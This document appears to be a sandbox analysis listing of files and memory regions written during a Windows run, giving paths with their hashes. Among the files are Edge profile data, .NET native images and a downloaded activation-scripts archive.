C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b68413cd4fc26805833328ec6dcd1f07 |
| SHA1 | eebdfa0cd9e9cb32b1d1aaba71e14c6b483eb93c |
| SHA256 | 6c92ae8f747d245926dac90654fb1d03734d61d3ef4b08481689e3bf47a7727f |
| SHA512 | c0ed451e65d886968ddf5a25452696a993612988bc3b78083bbab58efc7ca33cab4b89fb0f642858a7fce5979125960f02788feedb5489211d04f007a1574936 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 32c84dbeab5ef3e53ed54c5d0eeddc3e |
| SHA1 | b15f4501d0b19e255d8bf8406db59885a23b76ee |
| SHA256 | 86249c5a8107333cee3ac11affd6ccfedd6c2da6479b7abd84ea3309ed6a712a |
| SHA512 | 9b78fa6dce6bbc98398c23b408ffd6e870c4015844e874aff199634cb573aff1d43397ebb3ae82b86c1b4b9960302cf17c84481eff2c2d10748e3c2fab379d67 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 1c98b837bbca3ebdd0fa7c3efa18782c |
| SHA1 | 97523910f64cbfb45e5b5461bab607ba0d1e6622 |
| SHA256 | 8a7aaa44ee37a9b03d9f8670ef14570addc76e3ca7480730917030980521ca66 |
| SHA512 | b2b33b4446fb7b7d39b0291da626e63720d71c68c2b9310bb760932837a49c9435d9dd28e75c566e1227220b51a1b2fd539ee230195945051f985fe1a9332d5d |
C:\Program Files\Greenshot\unins000.exe
| MD5 | d1a078992e232919ea834226aea627a8 |
| SHA1 | 53f5af8c06721ef5b62f56037e3b57dc4b517eaf |
| SHA256 | 655da9c7f64ef8f0f48160c76b8dc5443aaba63e8c6b3534a266e9cd5a18489f |
| SHA512 | e056370322e58725961c024d1f322d31066bffd8b8d77f80fc14d2b5861788ef00e5ebc3fa6f51a6b0a94bdb02e8fffea48926716275754dd77bbe0fb8e221f8 |
memory/6080-1299-0x000001C6B2700000-0x000001C6B2782000-memory.dmp
memory/6080-1300-0x000001C6B2670000-0x000001C6B26AA000-memory.dmp
memory/6080-1302-0x000001C698890000-0x000001C6988A6000-memory.dmp
memory/6080-1301-0x000001C6B2900000-0x000001C6B2970000-memory.dmp
memory/6080-1303-0x000001C6B2890000-0x000001C6B28E0000-memory.dmp
memory/6080-1304-0x000001C6B2B00000-0x000001C6B2C88000-memory.dmp
memory/6080-1305-0x000001C6B26B0000-0x000001C6B26D2000-memory.dmp
memory/6080-1306-0x000001C6B2A30000-0x000001C6B2AE2000-memory.dmp
memory/6080-1307-0x000001C6B2970000-0x000001C6B2992000-memory.dmp
memory/5912-1309-0x0000000000400000-0x000000000052F000-memory.dmp
memory/5876-1308-0x0000000000400000-0x000000000042A000-memory.dmp
memory/2968-1311-0x0000064488000000-0x00000644881DA000-memory.dmp
memory/4508-1325-0x0000064449A20000-0x0000064449B18000-memory.dmp
memory/4184-1339-0x0000064443EC0000-0x0000064443F11000-memory.dmp
memory/4192-1353-0x00000644451A0000-0x00000644454A4000-memory.dmp
memory/2768-1367-0x0000064445320000-0x000006444561E000-memory.dmp
memory/4556-1380-0x0000064449980000-0x00000644499D8000-memory.dmp
memory/2252-1440-0x000001CABF540000-0x000001CABF5B0000-memory.dmp
memory/2252-1441-0x000001CABF8C0000-0x000001CABF8FA000-memory.dmp
memory/2252-1442-0x000001CABFE70000-0x000001CABFF0C000-memory.dmp
memory/2252-1445-0x000001CAC08B0000-0x000001CAC08C6000-memory.dmp
memory/2252-1444-0x000001CABF900000-0x000001CABF908000-memory.dmp
memory/2252-1443-0x000001CAC03E0000-0x000001CAC08AE000-memory.dmp
memory/2252-1449-0x000001CAC1450000-0x000001CAC1522000-memory.dmp
memory/2252-1448-0x000001CAC1340000-0x000001CAC1364000-memory.dmp
memory/2252-1447-0x000001CAC1250000-0x000001CAC1308000-memory.dmp
memory/2252-1446-0x000001CAC1140000-0x000001CAC1186000-memory.dmp
C:\Windows\assembly\NativeImages_v2.0.50727_64\GreenshotPlugin\d1de0df1f6fd715112604acd213f2d7a\GreenshotPlugin.ni.dll
| MD5 | 0afb09c97777a329dd05cad51a7e2a96 |
| SHA1 | 9c97a59a8154d0cc5c767402aa11141afab3c5a1 |
| SHA256 | 1225dd4003d33d6591a22b96ad246918bb54c65b3c78effa14794a0203ba68e9 |
| SHA512 | e73cc2e2bd845b1b42cc0bcceffb09f107f4254cc95f99d9ae5551a59b5576597d45d6457678b9fb3d897a9e1a594199838d27b7ecec4253c5b1eaab51253d23 |
C:\Windows\assembly\NativeImages_v2.0.50727_64\log4net\c5e4b5ba6d1ce9dab03aeb81a00b45b4\log4net.ni.dll
| MD5 | 068792db61bbdecd04d80b3cd3594c32 |
| SHA1 | a7ffb330596ee0113d5f79fac742463fa30d2154 |
| SHA256 | 82dbc6080e73ee4da40836a2118d825db3aa42ba3e2fb66678f0fd12d8352beb |
| SHA512 | 3b2e7065c06deff70e1a4367e6dffb37a68b4c5165a15660d3e45bdc368074f4ae3e0614bd2ebaf456df69e36f2138c81a78f8a90adf91ac595d57796ae1d813 |
memory/412-1462-0x0000022E12720000-0x0000022E1278C000-memory.dmp
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuration\e4db39da8a3b5543110df6ddd38ffeeb\System.Configuration.ni.dll
| MD5 | 060d36538a1c937e32943af480971b3c |
| SHA1 | 657c94ac480653524461015bdfe761dd212c31d8 |
| SHA256 | 6fbd851b513860f8354ed70c447ebb5f16754be86057c87dd6d46988f9507c08 |
| SHA512 | 4b8ff37bb1a9a43d672782f3fa3e9ace68a444bb71d8088842090e8c82fa5f2cbbfc2bdd12192af7949e269d8b957cc0bdc283469c15624efa47e4e1197c03ac |
memory/5640-1469-0x00000200ED100000-0x00000200ED2FA000-memory.dmp
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\c14588e2f9efa4d594f46143f50e7bcf\System.Xml.ni.dll
| MD5 | b8b08ddba209e4919d9d3a08f565c29d |
| SHA1 | 071f0742629bdc4218416180a2a73b5fcf8b54f5 |
| SHA256 | 536e053fa013c1999114139ea175c5622ac9ba98c39e76cb94537a7eb82087f3 |
| SHA512 | 9cf3e5cab9f994b4ae866cb3ea3cd7bb54a4dce3c033355355951a7722e28d94a1d05e3f55ed0e35d10edcf3680a57afc0ac8db37eba4e9e0f7b4c66486e7724 |
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Data.SqlXml\466db48c0235f1d6a651e870b94d9391\System.Data.SqlXml.ni.dll
| MD5 | 7863dad6521ae06d91567a415e4476d2 |
| SHA1 | 54325d3e8fc1e2b698c12f70fa3ab85ef4b5c523 |
| SHA256 | 0b038ffd06d568adc200d6a8909d3a05c3f66580ff13db3590797fe674825101 |
| SHA512 | 9d4ebb8490ba920d833947dbda98a830c82e1a94b98091f9fe8768de037e33334e1e27b3b31e88470a87a5c8357b808e1a6c7a77a5e1fe58b11990e00ae473c9 |
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Security\170c3a6a84f7509ab63e98937e4652cb\System.Security.ni.dll
| MD5 | 6f61c6adae2b50681325a6dfddb29d62 |
| SHA1 | c406bb31cdb08d38694efaf93b04cbb4f081d001 |
| SHA256 | 2b51e20e4debe5c2e697e032617b7d7d6d4251508e1423019e24bb851efe6faf |
| SHA512 | ed49b6cf1417d1bc9508ab586829c8437bda7f1bb572bfd06b7ebab894cafccadd653ec86b13052dff4fb19436c3e0e498f5541213c16fb653d2574ed13723d6 |
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Drawing\c7e28b9bc4375c076434dce6fd7bf657\System.Drawing.ni.dll
| MD5 | d9c40ec0dadd4e902bf4e862c42a8411 |
| SHA1 | 2527b3e1f404ec3030f6553cf54f466830c4b95d |
| SHA256 | 4ce12ed8daef863e9aa208a1e66d8df449306bfa417f0beec43da0b545cbb23d |
| SHA512 | 9b54ae2242080ab5b15a9c56e4c1991a9fa99b9df184835a5d7a0c166d68cc6af7316473bef186369d1d411c55d4b5631b848647327357bea181d3000708d918 |
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Windows.Forms\8207c013c0f0da13624762755d9e7c4e\System.Windows.Forms.ni.dll
| MD5 | 796a9ddd51615383d3fff96b38c6ddb9 |
| SHA1 | 52bbe495b840a58bf0ea333ad2f685da8803ae5a |
| SHA256 | ba71dd4860e1fe1fbd91774f03cc637d7b890c610627280b41d4e29f15070457 |
| SHA512 | aeff4108a6727093a59b12bace8893a6a332a950199537a251aac60a2e232fa0ca12bf51fc8223474b06f9a9fdcd5fa5b4fc678fe1890b15777f472bd20975be |
C:\Windows\assembly\NativeImages_v2.0.50727_64\Accessibility\e176a6d5cd5cdfd653e8096aa31617f8\Accessibility.ni.dll
| MD5 | a2e50fcb10e8525c93dce6c99fbe43ac |
| SHA1 | 09a2d26a808f1c89b3673ca18c039dc59d26532e |
| SHA256 | 70f98e52fc8bf0321b9562cccd5ab2f3b5062e9820909a3a9ad2c424c7b36bc3 |
| SHA512 | 92201aa57506ee3bae3c8e590806c6f01e79166df86c956d656b9b829cd17a7c550bbc2ab7659bd380a6f275324845586352078b480ab5c4212b72819e096071 |
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Runtime.Seri#\73d2d7d094c2c3328313c73b10aedb97\System.Runtime.Serialization.Formatters.Soap.ni.dll
| MD5 | 4ae40df8d34370140a381717ab50ee43 |
| SHA1 | 77e48136dade400051a769dbcfc00df53c418a26 |
| SHA256 | 229f36348993d723444e3efd8f7271a4faa5e1076e6d22ec74f0e81e0a988c44 |
| SHA512 | b9f1debd3eb7ced28f864e5adf271b4f3a999f975b267112dbc4e58a7ecec8e4246f6a9093f576844f2365ce41de380e0a24838b999db345c7a6b236de647133 |
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Deployment\e440b98295230d470860686828cad356\System.Deployment.ni.dll
| MD5 | 056f22728c8c630c4034d8b07936ba1e |
| SHA1 | 0a9ed151742ac74d745f4a2a9f8891a191f29065 |
| SHA256 | ab1f07fa49a944c47b29d52ccaf1b926985ed230c2ba78cbbbcd578231a5f9e8 |
| SHA512 | 4bab3240e6e6fb2ddcf5fde7be516cf64c0c1882ba5c9da7163b8174d3883d4985c52c25a00f0b4e0dfd717980713775a614024afbeebeb6c5ec8fdeba22619f |
C:\Windows\assembly\NativeImages_v2.0.50727_64\LinqBridge\f1ac6cfcd7f7945010f005a8862c17c2\LinqBridge.ni.dll
| MD5 | 832c5a96e82427912ad90c7c6ef8f022 |
| SHA1 | 1be966903e09c9097dbe7f872c0463fafeb90444 |
| SHA256 | 2c8fc5ac5f91265987f473b071e8313ee2f707963e8ac128c54bc746ad1ee3be |
| SHA512 | c2130f5947d3200384e1af3b338b52535ffa5bbb9041662497ee25b08084f2ee084313f7c8ffb78de093a229f76e51157e3681da0b6cf2ad0875e6caf61262b2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\37a9d4cc-e80a-4a63-a9fc-cbcaca632c65.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 69fa7f6ffa2848ade334002f28f6adbd |
| SHA1 | 79ee34eb864ee1c9a47e9bb3de0c4801460e1a73 |
| SHA256 | 2e479f746996ec09310fa5887aed2f26956e548fe34ea684da029f82ef44d94c |
| SHA512 | 0c03a1fdd39f75eb42a4d8c6b8b9d42b1bb9eeb4bea5fa6b2ec1d9def30509db483ba6ad5b7bcb374c4c35ef82120a878cec56fe15679a157166eaeb23e9995d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | c5fa189180a4b32f88ffb066925097f1 |
| SHA1 | 5721143d57e6a3da34bec6f8dd4fc2100fd176b0 |
| SHA256 | 29c50b0dc78a7f30788cf85372def5836c50428c5a166ad787503020717366c4 |
| SHA512 | 2f4f263d2c43a103b8ff4a9c60c26e71808ba33eccad26a6cd2903cd1dea28bd62a3aa273989f27449d4348bb8c335d9f6b4ada902e9b7a6bf59c62676979073 |
memory/5532-1567-0x00000000007A0000-0x0000000000822000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | aefd77f47fb84fae5ea194496b44c67a |
| SHA1 | dcfbb6a5b8d05662c4858664f81693bb7f803b82 |
| SHA256 | 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611 |
| SHA512 | b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3 |
memory/5532-1578-0x000000001B4E0000-0x000000001B4EE000-memory.dmp
memory/5532-1580-0x000000001DBB0000-0x000000001DBBA000-memory.dmp
memory/5532-1579-0x000000001B7C0000-0x000000001B7D0000-memory.dmp
memory/5532-1581-0x000000001DBE0000-0x000000001DBFA000-memory.dmp
memory/3064-1582-0x0000000000F10000-0x0000000000F1A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\7ef1abac-aefa-41fe-b2fe-fb9edaf64b55.tmp
| MD5 | 226feb9cc2ea5ee22e535720ac0d3055 |
| SHA1 | 4c72ea13025783f339cbf176e37467b78fde2db2 |
| SHA256 | cafeb0e21dd6dd160153b082785a6d7bdd4ad0e3e07ef4f0a2ea352bedfa3e30 |
| SHA512 | ce356e1cc381f22362aa9737939c35b7470ed278cd1916e29a199b36d1f6d60d495561f921fd9c278edf2a5504bb8d2021f82a5753b1a8105de36ae5f32553bb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 828c52729e614cbbdd8435429eeef979 |
| SHA1 | 25ba6e4d82072335fd2be3094ba6a472bc8a9b96 |
| SHA256 | d74df6a3f1d61effd8c47ad42ae67f7ca4678af13dc31f6df47ca04a09a72834 |
| SHA512 | 0645ec876f94ec3137eadd19185251cb7d025209af5c6e4c937bf7f28b5dc950fef07dd346e611ca03750e3fafa34de04a40e0d0870f925b6288919d024057af |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | c90bc55a73329d6546df66fcb040dbb6 |
| SHA1 | f3911c16cf6d4c1780ea2b33e7ae99ab31a6e032 |
| SHA256 | 59981fccdda4f5e9a41650df8e9fed528c0f36da1bde5988188b407ec904e142 |
| SHA512 | 1301cb7dde3852fc7fe7f31d8c1cabab65d3be52aba33f5181167e965b338a7128be663b646e8283935eda90af47971b6f093c0bb263e470148e5f8b349938e4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | ddaafff0605b874d17a1dc4321e07426 |
| SHA1 | b4552b0dbdbda4d8a11be0cbdc2105aadaadcc90 |
| SHA256 | 8418958edf58f3e5a7fa6a7da90b9bbc45b53001a24591ee1722d12bb1ab9fa6 |
| SHA512 | b642ea2e3220c1a26cf5129be628fee2ca27543cd3d4a89196db6d0888a65a6a4da0cd7945f723859bdc5afb8391bbd7606d69c5a49da04aa8cfd413feb3d644 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 5b9654655a99901b81081e02487f2335 |
| SHA1 | 8547d92e99a4975a26e710778a3d69b32e745ad4 |
| SHA256 | 316a4593ad95051e89625a5048b1ce14747bdf095b63b3389376830e1505220c |
| SHA512 | 13361da36d8094f6da35071f7780ff80615e1e04b08849790941c3781ea7519422727068127393c8a27262a6bf8b02368db042eb79e69519ec894667164e2212 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 5127e46a9873c403f2610fdb3a476488 |
| SHA1 | 29b414aed39ee47379a8f8c5b7cfa09e52b52a4f |
| SHA256 | 69053bb0a53aecee87b225e5371969f53d701a1ea7f4f2b11764758a91209a5e |
| SHA512 | 1d10b60affe2a355a191e88ce46e538e61b136b3a3a55adeb35650cc7c063aaf1ad712a10135b6d52cf490337b646f4347a2170d0150b581526e4c4aba83cc57 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 17f53dba7d9cb4da99891e48e9ed5934 |
| SHA1 | 1cb47228cd48ee02d36e0239f302697506484167 |
| SHA256 | 42462c3b6e3fa4816d47e3c7cafc05d73850db5641319048b7801fc40b888074 |
| SHA512 | f23d36e2e625a56f4b3b37b82ff287c42eeb99d0f441c559d3a823bdaa817cf21789fcea195e1053443fd4fee7281f8cb7b4f51f1d3b54fc458616eba37a6b91 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | b9f9bc535233d1152df79ac96bb76663 |
| SHA1 | 7deb3049550508cf20774f7756d8910966e9b886 |
| SHA256 | a36579e57038aef8bb810ea3d0731bd86db046b1b1ea245ccc440b68ebe6ed83 |
| SHA512 | 8d729b1d783bb2f77dbd87e37a4c40cb44b372b2434cc08ea519602141757fc86b1c3b3a8bcec825ad0ad9ad92fb378f50bec7cdd923e60cce7f2bd20d04bb39 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b160a94b902968b62233b0749ffc6c97 |
| SHA1 | 2925c4a47b71ca9bf8380d07a689421c6ade1f43 |
| SHA256 | a1ce364c22aa526334abf0fb5c4533296ae6297745ba23522d5baadf0bddcb1d |
| SHA512 | c235eb5b19d7b1009eb0caf3b9f7cf5c45b98559c82d2b29e9f5bc97435a24ba281d58ebe4ad60fde41d760fcda0f69d1855b9faa49d195c0d2df1f7aed1aa16 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 8c93ca6ab441d54c5f6916850284226d |
| SHA1 | b3f14fa160333619abd549fd5ee3de58483baf19 |
| SHA256 | 329c6a070acd43e6addfcfcb92e2f87bc2302c64492056bbba6f0d1e19499cf6 |
| SHA512 | 68e1f1572047d807f0502175b4f0570e10ebcd43a7d69810d224de1f63a6bcc388e419260f838325e4f74a74342b77424001f2d474d9a10b3ef5ded82bc2edd3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 0f86c6dfeb521dd28271136329fd0d66 |
| SHA1 | 5d398508565c345222115325a0eed079ab4911be |
| SHA256 | f5e3efb8b47ecea2a4bd10322a2cee3b8405297b00805e735370fc62c6233ac0 |
| SHA512 | 10e82018227460bf3081c383314f9b9b7f6a1340f4c66097998b04dff9410bec5aa30bc8cb11e9f12cc65da18419aded7c1eb572297517ab465965cd1228f906 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 22b16d5173981a536e8e2260b8e9b88d |
| SHA1 | 7d0f4943e593ca9bb328c118b0e25ca3129a0471 |
| SHA256 | d5bd527cc69127ac338c5bb9d71d2dba06ca81985d42d6698b7e0c0f7cbffa5b |
| SHA512 | f91a8fb90d58a89c9d04681d9841c380b4ab181d63bb8813a59b038a8d65b9d217b29b0ed419479b860016d8f54363a0e39d99a5771fad942f31d9d2f9ac9a1b |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RXDPSXA6XH2DN30U8PY3.temp
| MD5 | 4fcb2a3ee025e4a10d21e1b154873fe2 |
| SHA1 | 57658e2fa594b7d0b99d02e041d0f3418e58856b |
| SHA256 | 90bf6baa6f968a285f88620fbf91e1f5aa3e66e2bad50fd16f37913280ad8228 |
| SHA512 | 4e85d48db8c0ee5c4dd4149ab01d33e4224456c3f3e3b0101544a5ca87a0d74b3ccd8c0509650008e2abed65efd1e140b1e65ae5215ab32de6f6a49c9d3ec3ff |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 589c49f8a8e18ec6998a7a30b4958ebc |
| SHA1 | cd4e0e2a5cb1fd5099ff88daf4f48bdba566332e |
| SHA256 | 26d067dbb5e448b16f93a1bb22a2541beb7134b1b3e39903346d10b96022b6b8 |
| SHA512 | e73566a037838d1f7db7e9b728eba07db08e079de471baca7c8f863c7af7beb36221e9ff77e0a898ce86d4ef4c36f83fb3af9c35e342061b7a5442ca3b9024d2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | c371d2c48bdd45a780ae3f814ecb34f9 |
| SHA1 | 62606b6dd0a80a42d5ca4b50d32878965c27bccb |
| SHA256 | f6ce3bd88228081e78c8d91039addc8823fc1100b294cef4d3c333ef37ae85bf |
| SHA512 | 2520e2cda97738d05b629c1722520c4e5b63e4a8c80367d2e641bf71a85a2236640ea871e7150fa780b7864d4f141852eb381903d3fd48873df40316084ab412 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 52ff5a5c29bba21c47ad07dd82f9959d |
| SHA1 | e2c85d4db199c19006bdd8f9f153ab6987d81264 |
| SHA256 | 263b6cf2ace4310f46b69aa178396938651bcc8400849789b69e8d91863fb387 |
| SHA512 | 8aec1b9197a3ded28e5d18b339f070cf929960747ade16776418bc41fde14ce6b7c122d25abf249cc15142782f8b9ccb1dd7efc75baebd0b91d18ab9e998554c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 1fe320a53f9ebf969e2ca97c84aea322 |
| SHA1 | e6546ae31197f47752f625989246b89500ab0fa6 |
| SHA256 | afd21b89e07d88c4fdbe89eae2cd73e61c534e77209979da2e9de917b41ac990 |
| SHA512 | 78fd98cf908da84ce2514395e6894211618273ccb3de2e38d1fffbe7cd9794f0cf2bf89b32eff569331cc58a77b5c126315c2a6fa659b3a163e0555b257701cc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 343d0fe18f61d1c19e564ef1811c349b |
| SHA1 | f95fbc2393b322e0852232d5509c93ccc7eec297 |
| SHA256 | 94195f35a3d76c37a6db44fdda2ad2e2b417bda52905d6f712f4e2c98a4ced52 |
| SHA512 | 042238ea89ede8834524c16fc96bc0a055542d76e12733eefd7defe93b7869fa59e8a6aec1af2a4f526c4fdae15d06da513dbf68caabe4553114cb1b922fa9e1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | da557336712c00c8ebd5bba26289af89 |
| SHA1 | 7eaf0db47039f7abb9f8fd135a116c30241ddb43 |
| SHA256 | fc7eb83d942a887c13aeeb0d799d4b915b7a305bf7b86cbde62a174839185fda |
| SHA512 | 9882f9eed9d3e82963c0a2dc4a66e183d41dd146a38519a284fc2b86de8e9d01fa1856783c774bb35b064dc4edde473557488c71d8e0e7db9ff486e206bc9441 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 5410366d71e705ea9bde0128a306ccfa |
| SHA1 | 3f9166c1d4ca37c3cc5e1d8bb42a7c686bbf1224 |
| SHA256 | 38ca6b9f0318aded4d23ba7ed097dc253ff7ad1b312701921a2684794dc068bc |
| SHA512 | 4410ea631b63238fd85cd8583f371e11027de453f4ba7ec412f30f9eb4bb3fdc364f9f4de26073fa8be8aa9c260df83305e6e4705974167b069e7eeb0e0b29a4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe61f368.TMP
| MD5 | a21188ad9f40ee41f2a5c64dbec3698a |
| SHA1 | 0688131e72eda47dce3173e0f52e188f023bfed9 |
| SHA256 | 9a2741098678a553ecb7239a0dbb5c23083f7a7b6eaf47b3ec276567c759ca58 |
| SHA512 | e104a899253b37618168a47e5b65111cf68fe217ad19e1573e7eeb2f90f5800834436a546f946eab3e129b58cbcd6d708b2282d76fdb28d278561120600b3877 |
C:\Users\Admin\Downloads\Microsoft-Activation-Scripts-master.zip
| MD5 | bf0f1add95ef479d38db30554a4aede0 |
| SHA1 | e05b44aee0a9df0edaa7de4ad24fa18ad407075f |
| SHA256 | f798b0790fd6e62fb0ff0195c06f7c655ae0a55e1b3c9d6b4c28b7d5483ce6f6 |
| SHA512 | 2f4b4d50844db1064de7ac918738ab21621f7245434aeb74de2fd2baf0c4367ad4057e5c9ef810f09e5c374ac4e3ea8ab85d960d3549f72b763dccb2d37e8925 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 54a9c896232e4bdcdf46b0e453de1701 |
| SHA1 | 3564af531107d29de9eb9a815881d93ec8c21313 |
| SHA256 | f7be41f180ff23b35bc337a71ab1b1efae7ebaf89728496e4b1933481cabe749 |
| SHA512 | b8b663eb81614fd738e8af005b6ddeddcdee9087b33f05f6628e0a3079b414bf80a41d1016259dce06f427b71c8b696d12746cbe1c4dd088159fef999ebb6d9e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 44a10d47ce93c393fbca89128cbe1423 |
| SHA1 | bea24b64d3a8167ebd4334e815d7d8ceb97d9708 |
| SHA256 | 2dc91bd7c36f01a2c9bb04b01c33f24ab98b6fe65c83b5cac6368763b68e08ae |
| SHA512 | e63dfc397a009cc36dbb895ebcb93f075e24a465c75f57fe949b2182ee0b8ee6690f5910d49d7f78d5239df5c9853f8406f0a64bf315b34ac9e82f3186176bc7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 46992062da814e698de5813c518bf0f5 |
| SHA1 | 58119e38ab2032dd9f0dc17501f2e09896e8dda6 |
| SHA256 | 56de75a94dda498d65ce90881afb1cdfd6b5ffb878fec9b47d930159333d804f |
| SHA512 | 4b16ecb871113f546bb650f871bdd55b2cc397b646d7aeb674359c53120ea02580f25b4460d47993de3718eaec9267654fd6bc6f59ce77589f99881543d401cf |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | a7dc262c080fc8f9866c372520c6d571 |
| SHA1 | 0a2a2cad59fe32142062821abd919968851f6074 |
| SHA256 | 4bbfc2dbf72731c4545734c5bccad0c4d76f589adf1244eac3a5d7a655736ba7 |
| SHA512 | 301edaae94e22905f5ad7a9a435fd617a6030e0a84696e035051ec41b9c2379ab4aa15e0b3056ec08ac4b9a3a945f974254bef63d84150d72675b7f22988105f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 7d7f490ab1a5145cfa3256f530412c89 |
| SHA1 | 990fc8bdcc590d51585c2dc529ba95f0776a731d |
| SHA256 | fc9358528734ffc7ef02d0ef667b06a181b7b1dc28baa557b201371035b262ca |
| SHA512 | a5d146059e166785e74f721b32f2d4a16778ff76f52d57eec4db91c9685311c4d68cce1043e18f36bac1f22e88ae45c808dc26c351f631110b41cb197394a949 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 17da28cb77e424ac192ff9447cb2c4c8 |
| SHA1 | 7f36ac1179871a6b618862f7267083479201c3c9 |
| SHA256 | cf606aec00453d80b82320ac2e0e8deb38a6e57ca58739cde71673f563399d80 |
| SHA512 | 2c59ac5cbe9a38b7010d37b939feb5ff3f0f6210defdc88bbdf27d81b5b2a66083809f2cf973f63aa84b1d9ad7eb2444ed7c2b78f47cc803548200a21d091e3b |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_flgb5wjn.mlg.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 446dd1cf97eaba21cf14d03aebc79f27 |
| SHA1 | 36e4cc7367e0c7b40f4a8ace272941ea46373799 |
| SHA256 | a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf |
| SHA512 | a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7 |
memory/1712-2598-0x0000029848180000-0x00000298482F6000-memory.dmp
memory/1712-2599-0x0000029848510000-0x000002984871A000-memory.dmp
C:\ProgramData\Microsoft\Windows\ClipSVC\GenuineTicket\GenuineTicket
| MD5 | 923ce4120dffd5255bfccd38b53d9403 |
| SHA1 | 49a6ee78cc1616864e2e35b76396add0452ee09c |
| SHA256 | f7a53c5a32dd9fbd55a36bdb756f33ecf0f42f25eca8b6fafabd1fc516659e24 |
| SHA512 | 5338a2425a753c1438447c1715443d3be21013e0a665a5b1c0ac1f1ecf474368bff9ad131ac7e8f94b4a75cfaa74fb976661d90181ca6ada109492efefdc1568 |
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
